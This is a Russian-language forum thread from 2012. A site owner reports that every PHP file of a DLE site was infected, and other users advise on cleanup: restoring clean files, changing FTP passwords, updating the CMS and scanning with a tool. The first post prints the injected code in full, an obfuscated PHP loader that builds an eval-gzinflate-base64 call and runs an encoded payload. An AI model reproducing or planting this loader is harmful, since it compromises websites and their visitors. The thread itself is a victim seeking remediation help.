X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вредоносный код в Php файлах [dle]
casp
casp
Topic Starter сообщение 5.10.2012, 13:55; Ответить: casp
Сообщение #1


Приветствую!

Сегодня захожу на свой сайт, и обнаруживаю такую проблему, ругается касперский, типа вирус содержится и т.д и т.п
Я сразу же рыть файлы, и нашел вот что. В каждом php файле прописана такая дрянь:

<?php
$md5 = "61836c1a8a0763b37a88d9df07e4e";
$a8 = array("g",')','$',"e",'6',&quo

t;z","a","c","(","4","d",

'b','i','n','l','f',"r&qu

ot;,'v',"_",'s','t',"o",'

;');
$b88 = create_function('$'.'v',$a8[3].$a8[17].$a8[6].$a8[14].$a8[8]

.$a8[0].$a8[5].$a8[12].$a8[13].$a8[15].$a8[14].$a8[6].$a8[20].$a8[3].$a8[8].$a8[

11].$a8[6].$a8[19].$a8[3].$a8[4].$a8[9].$a8[18].$a8[10].$a8[3].$a8[7].$a8[21].$a

8[10].$a8[3].$a8[8].$a8[2].$a8[17].$a8[1].$a8[1].$a8[1].$a8[22]);
$b88('DZRHroRYAgSPM91igXeaFd5TeLcZ4aHwUMCD08/PRRwgM5T1lY//tG8/N2P+q/8p8qOmi

P9VdblU9T//EStPlvYg5gaxI3135fcuMlqnVL0tuwzTA2fcbzgMqzv5bl+rgSe6xlHX+eRfCD4z2vNU2

KB+vbmdMAx0UwSh432kfPA/9c1XdX6PSp0/VWG9faGDW1mL11ESKgqwjiDf50xiU65IQAN/U+D8fZpkF

0L4ZuGSTmADS/oG+2QITmne1Trha4pPkRthuxpyrxSxyy9fxyzkzqdwmNmayS9zEjqnzkoyaObkCJKow

Au7WmY8RZrBhYvaPc5ypGdbfFy3Fr1JjBXPrp4JzQjmVhnMt7AiFTvBUJexydjtD1jK4FhTpYJKvlXfg

YSJlY54l9DQ1YkJhIUuDVmEJ8JUBoN0ur6PmleY52glj7neZqbipzRVnRaPAmaRYn1b1yzC2CWFQ9xeA

btLhcnvah6kdJLJ2StRLD72ksaj2+acLo5q9td3jB4pt4uCQo0FvFd/frT1ypuOk8QVZwm1ggCX7xFfx

njKAITig6fmKg7l3V0vLGtILmBG9GZakJzLKbThTdfkFHikPDfMN3Wr8YlXIoUUyubPkgjzPYphYtDPV

4fPxTCQdOqNR7B/h4SI38cF6rUg0d/O87QV7WVWsYmOum+Zovayh9X6tPCojQSrPMH71Z8tp2dzH3mnR

Pq9Hc/n6qZqHIh0diTwsOPhdcSBXoylw82pxuKvhixxO2x4BQXuUIpCPR87kBfNGuo1dpTQqquNU5Wg7

qUFH7iMZZasHM4vhD3z4zua0D/IgWVuC6qi+Vo++rDS1xyfv8EEweuqkjx5s6HKuJiJWKcZ9v17aVtPR

/cH7u0Nv0CZ9+nnnpUjaWHi19bFSrwnQ55Rp6DomGxr/ATNaWUeJt6Kdq3GdaSpNCMys0vvFmSzu3ZsQ

v77wY1fiSs2fZcD/rP71DLLgEtUYgqt6DRmOb2WpBZt11XJLqm9yejC5guF7lRTA/BBJoOeJjKfkiUL3

zOE/qjMNPsTX1Ed4cizwzFvifqlv8
jktjBOTG0Fz2DxFQhzcRqiNaa57jKyfPkF9bGW+LoggHcm4HQg3x2rmjKTWfJXASGkSnaLXop3yHiv/R

MInaPUr1kb9RlpWlMoVO/zUYmSKQ2QIqJWpiFUYFpRILcTB5eunvFpDwWGBke4t4pxf3pPsuRWORhRYB

c9CKd/0G28jyapS/OdY8MCGjIwgkGaEW/q/Vw1HMO1ynhcLyd7VFzLxaFwP3GDP9ThvwoK432VCb95Zz

Hj7SGsK/VWKFupZ3PW4VbFZofoSE7EAmP1jtwGYqE0XvRUzCmT60AB0rGOb9kP+pkN8qsQ9/8aO2O/6+

NwzLEzcWOmNIEYf3SN2oncBkkNCObBxt2uG3AXM17HjvKidsiXx5vOzPgercCsMlmmhC6KpMiauHl9YL

9HqFaujrWTflwY7tGtYGfPhv1Hd/o5Tc/HWNMx9eEVIwpjzeT4n+yU7tvRw2ljKAH4C7/Tv2eeyfDHCE

jWSBL1qS3As8noF5qZPXLniGkxgTNhwfC3PVqC4q9grLe6iNLQldRXqZb1gxz7WZmb6OH47QXPccvg5q

sK8jOpGo5ixyyQop5ZB+OlDDUQVNebBnolxBpafd0+3v1glpFameo133oLN84fIutMgAplIM37Ru/f6C

w1DUF03Dcw4//n333//+38=');
?>
<?php


Как это убрать всё массово? Откуда эта дрянь пошла, точнее с какого файла. Вычислить бы и удалить(

Сообщение отредактировал casp - 5.10.2012, 13:56
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
psk89
psk89
сообщение 5.10.2012, 13:58; Ответить: psk89
Сообщение #2


Какая cms у сайта?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OlegK
OlegK
сообщение 5.10.2012, 13:59; Ответить: OlegK
Сообщение #3


psk89, вы заголовок топика читали ?

Сообщение отредактировал OlegK - 5.10.2012, 14:00


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
psk89
psk89
сообщение 5.10.2012, 14:06; Ответить: psk89
Сообщение #4


(OlegK @ 5.10.2012, 12:59) *
psk89, вы заголовок топика читали ?

Извиняюсь за свою невнимательность.
Смотри файлы .tpl - он там спрятан - в каком именно сказать конечно не могу. Найди там подозрительный (ненужный) код и удаляй. Или если есть на хостинге проверка антивирусом - то она выдаст тебе название файла где есть вредоносный код.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Рэшад
Рэшад
сообщение 5.10.2012, 14:11; Ответить: Рэшад
Сообщение #5


вроде если во всех файлах такая штука выкачивают сайт и делают через нотепад++ замену на все файлы, но в любом случае вам стоит подумать о безопасности сайта и закрыть дырки, обновить кмс


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Infacto
Infacto
сообщение 5.10.2012, 14:13; Ответить: Infacto
Сообщение #6


Если осталась на компьютере оригинальные файлы - замените.
Так же смените пароли на ФТП, поковыряйтесь в правах доступа к файлам.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
Topic Starter сообщение 5.10.2012, 17:16; Ответить: casp
Сообщение #7


Спасибо.
Найти бы эту заразу .php которая разносит по всем. А то думаю опять заразяться файлы потом((

А никак нельзя найти этот шел на сервере?(
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 5.10.2012, 20:13; Ответить: Rxp
Сообщение #8


ТС стчите проведем полный осомтр и удалени всего вредоносного, втом числе шеллы, загрусчики и т..д. + дадим рекомендации!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
silvan
silvan
сообщение 6.10.2012, 14:02; Ответить: silvan
Сообщение #9


руками это тереть конечно жестко..


--------------------
Эх, где же maultalk образца 2010 года... Где та атмосфера?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FRUTALITY
FRUTALITY
сообщение 6.10.2012, 14:37; Ответить: FRUTALITY
Сообщение #10


(casp @ 5.10.2012, 22:16) *
А никак нельзя найти этот шел на сервере?(

Попробуйте бесплатный скрипт ai-bolit, мне недавно помог найти шелл.
Массово удалить из всех файлов можно php-скриптом, если владеете программированием, но надежнее просто перезалить исходники.


--------------------
Magic 8 ball как в фильме "Трасса 60". Онлайн.
Мой скромный бложе.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) DLE xProtect
2 xoopw 5950 15.1.2024, 21:06
автор: Diana_Wesley
Открытая тема (нет новых ответов) СОЗДАНИЕ : / САЙтЫ / ЛЕНДЫ / БОТЫ ТГ / ВАЙТЫ / КРЕО / СОФТЫ / ДИЗАЙН [PHP, JS, HTML/CSS] и другое
5 CULA 3289 19.12.2023, 18:55
автор: CULA
Открытая тема (нет новых ответов) Услуги по созданию и доработке скриптов PHP, MySQL, JavaScript, jQuery
Разработка сайтов и сервисов под-ключ
0 alexey 1168 24.11.2023, 14:46
автор: alexey
Открытая тема (нет новых ответов) Обновить сайт на CMS DLE
1 Sawich 1641 2.9.2023, 10:10
автор: WoWeb
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыВеб-разработка (HTML5, CSS3, JavaScript, jQuery, Ajax, PHP)
56 qpPeW 44761 19.7.2023, 10:03
автор: qpPeW


 



RSS Текстовая версия Сейчас: 28.3.2024, 18:59
Дизайн